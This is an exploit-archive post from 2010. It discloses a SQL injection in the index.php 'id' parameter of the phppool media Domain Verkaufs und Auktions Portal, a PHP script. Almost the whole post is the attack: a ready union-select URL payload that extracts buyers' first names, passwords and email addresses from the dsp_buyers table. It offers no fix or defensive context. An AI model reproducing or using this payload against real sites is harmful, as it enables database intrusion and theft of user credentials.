Home / os / winme

phppool media Domain Verkaufs und Auktions Portal SQL Inject

Posted on 14 March 2010

========================================================================= phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection ========================================================================= ----------------------------Information------------------------------------------------ +Name : phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection +Autor : Easy Laster +Date : 14.03.2010 +Script : phppool Domain Verkaufs und Auktions Portal +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/portal/index.php?a=d&id= +Exploitable : http://www.site.com/portal/index.php?a=d&id=-11111111111+union+select +1,2,concat(firstname,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11+from+dsp_buyers-- ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP